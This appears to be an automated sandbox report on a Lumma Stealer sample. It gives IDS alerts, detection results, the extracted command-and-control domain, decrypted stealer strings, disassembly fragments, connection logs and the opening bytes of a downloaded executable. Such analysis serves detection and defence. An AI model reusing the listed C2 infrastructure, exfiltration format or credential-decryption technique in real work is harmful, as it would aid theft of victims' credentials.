2024-11-23T12:47:17.087141+0100	2018581	1	A Network Trojan was detected	192.168.2.4	49735	192.81.132.76	80	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T12:47:15.408983+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	49734	192.81.132.76	80	TCP
2024-11-23T12:47:17.087141+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	49735	192.81.132.76	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T12:47:23.653246+0100	2057646	1	Domain Observed Used for C2 Detected	192.168.2.4	64241	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T12:47:40.236614+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.88.250	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T12:47:13.972120+0100	2803305	3	Unknown Traffic	192.168.2.4	49731	104.20.3.235	443	TCP
2024-11-23T12:47:15.677699+0100	2803305	3	Unknown Traffic	192.168.2.4	49733	104.20.3.235	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://revirepart.biz/

Avira URL Cloud: Label: malware

Found malware configuration

Source: 24.2.zbjnkzvo4cc.exe.68c11000.3.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["revirepart.biz"]}

Multi AV Scanner detection for dropped file

Source: C:\Windows\Temp\mxtvcgq32fe.exe	ReversingLabs: Detection: 26%
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: SystemCoreHelper.dll

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\gdi32.dll	Joe Sandbox ML: detected
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll	Joe Sandbox ML: detected
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: revirepart.biz
Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Screen Resoluton:
Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: Workgroup: -

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 26_2_025BA4DA CryptUnprotectData,

26_2_025BA4DA

Source: SystemCoreHelper.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.184.174:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49814 version: TLS 1.2

Source: SystemCoreHelper.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %%.pdb source: mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: $dq7C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.pdb source: rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: $dq7C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.pdb source: rundll32.exe, 00000003.00000002.2634374806.00000000048E1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2242896029.00000000008FA000.00000004.00000010.00020000.00000000.sdmp, mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Temp\mxtvcgq32fe.PDB source: mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbKBQ source: mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbTAK source: mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Temp\zbjnkzvo4cc.PDB source: zbjnkzvo4cc.exe, 00000018.00000002.2242896029.00000000008FA000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]	24_2_68C294D0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]	24_2_68C1F496
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]	24_2_68C1F496
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov edi, esi	24_2_68C16CB0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+30h]	24_2_68C17C70
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then add eax, dword ptr [esp+edx*4+30h]	24_2_68C17C70
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov ebx, eax	24_2_68C12C20
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov byte ptr [eax], dl	24_2_68C3DC30
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ebx+1Ch]	24_2_68C1E5EC
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov ebx, esi	24_2_68C1C9BE
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+74h]	24_2_68C1B150
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], A2545BF7h	24_2_68C52D70
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	24_2_68C1BD7E
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov edx, ecx	24_2_68C36910
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]	24_2_68C52930
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov edi, eax	24_2_68C19EE0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+74h]	24_2_68C19EE0
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov di, 0008h	24_2_68C14E86
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov byte ptr [edi], dl	24_2_68C1DE8D
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_68C2DE40
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then mov word ptr [eax], cx	24_2_68C1D252
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+ecx-18254539h]	24_2_68C1D252
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h	24_2_68C1EBD9
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then push ebx	24_2_68C1C703
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	24_2_68C52F00
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 4x nop then lea ecx, dword ptr [esp+00000A28h]	24_2_68C1EB14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, eax	26_2_025A9AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+74h]	26_2_025A9AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], dl	26_2_025ADA8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	26_2_025E2B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edx], al	26_2_025CF3ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax+0000009Ch]	26_2_025CE398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edx], cl	26_2_025CEB98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]	26_2_025B90D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	26_2_025AB97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5B126FE8h	26_2_025E27D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+74h]	26_2_025AAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]	26_2_025E2530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, esi	26_2_025AC5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	26_2_025BDA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ecx+esi*8], 4F699CD4h	26_2_025E3260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov di, 0008h	26_2_025A4A31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	26_2_025DDAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+30h]	26_2_025BE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ecx], al	26_2_025BE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	26_2_025CCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx]	26_2_025CB340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	26_2_025BBB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push ebx	26_2_025AC303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebx], cx	26_2_025BEFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h	26_2_025BEFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h	26_2_025BFB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ecx], dx	26_2_025BFB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	26_2_025C6BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]	26_2_025C6BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, word ptr [edi]	26_2_025C6BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	26_2_025C6BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	26_2_025CD040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+30h]	26_2_025A7870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add eax, dword ptr [esp+edx*4+30h]	26_2_025A7870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	26_2_025CE06F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dl, EAh	26_2_025E1860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	26_2_025CE039
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [eax], dl	26_2_025CD830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, eax	26_2_025A2820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi-3E780BCDh]	26_2_025CA0D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx]	26_2_025CB0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	26_2_025CE007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]	26_2_025AF096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]	26_2_025AF096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, esi	26_2_025A68B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], A2545BF7h	26_2_025E2970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dl, EAh	26_2_025E1930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [edx], di	26_2_025BFF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ebx+1Ch]	26_2_025AE1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	26_2_025D79E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	26_2_025C5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	26_2_025ACE52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+ecx-18254539h]	26_2_025ACE52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ecx], dl	26_2_025CDE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	26_2_025C6E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]	26_2_025C6E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, word ptr [edi]	26_2_025C6E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	26_2_025C6E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-6032535Eh]	26_2_025C96F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, edi	26_2_025BF6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, ecx	26_2_025BF6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [edx], di	26_2_025BFF7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	26_2_025C6F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]	26_2_025C6F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, word ptr [edi]	26_2_025C6F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	26_2_025C6F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then lea ecx, dword ptr [esp+00000A28h]	26_2_025AE714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h	26_2_025AE7D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	26_2_025BC7C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebx], cx	26_2_025BEFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h	26_2_025BEFF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax+0000009Ch]	26_2_025CEF87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000D3h]	26_2_025BBFB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	26_2_025CD4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+2C0C617Eh]	26_2_025BDD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax+00000404h]	26_2_025CFD65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, eax	26_2_025CFD65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	26_2_025C6510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, ecx	26_2_025C9520
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 4x nop then mov byte ptr [eax], dl	30_2_0058F670
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 4x nop then mov word ptr [eax], cx	30_2_0057F880
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	30_2_005A4940
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]	30_2_005A4370
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]	30_2_0057AF10

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49734 -> 192.81.132.76:80
Source: Network traffic	Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49735 -> 192.81.132.76:80
Source: Network traffic	Suricata IDS: 2057646 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz) : 192.168.2.4:64241 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057647 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI) : 192.168.2.4:49741 -> 172.67.184.174:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49752 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 172.67.184.174:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.184.174:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49744 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49747 -> 104.21.88.250:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.88.250:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: revirepart.biz

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 11:47:15 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 22 Nov 2024 15:53:53 GMTETag: "af000-6278263cd54f1"Accept-Ranges: bytesContent-Length: 716800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 a8 40 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 f2 01 00 00 fa 08 00 00 00 00 00 0a 60 0b 00 00 20 09 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 26 09 00 57 00 00 00 00 20 0b 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 08 00 00 00 00 00 00 00 00 00 00 00 00 20 09 00 48 00 00 00 00 00 00 00 00 00 00 00 6d 09 40 19 6b 07 61 16 5c ef 08 00 00 20 00 00 00 f0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 80 ef 01 00 00 20 09 00 00 f0 01 00 00 f4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 06 00 00 00 20 0b 00 00 08 00 00 00 e4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 ec 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 60 0b 00 00 02 00 00 00 ee 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 